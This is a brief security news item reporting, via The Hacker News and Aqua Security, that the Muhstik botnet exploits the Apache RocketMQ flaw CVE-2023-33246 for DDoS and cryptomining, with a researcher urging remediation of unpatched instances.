Vulnerable Apache RocketMQ instances impacted by the critical remote code execution bug, tracked as CVE-2023-33246, are being targeted by the Muhstik botnet to facilitate more expansive distributed denial-of-service and cryptocurrency mining intrusions, reports The Hacker News.
Initial compromise through the Apache RocketMQ exploit is followed with the execution of a remote IP-based shell script and deployment of the botnet, which conducts system metadata collection, lateral device movement, and command-and-control server communications in a bid to launch DDoS attacks, according to a report from Aqua Security.
"…[I]n previous campaigns, cryptomining activity was detected after the execution of the Muhstik malware. These objectives go hand in hand, as the attackers strive to spread and infect more machines, which helps them in their mission to mine more cryptocurrency using the electrical power of the compromised machines," said Aqua Security researcher Nitzan Yaakov, who called for the prompt remediation of the more than 5,000 unpatched Apache RocketMQ instances.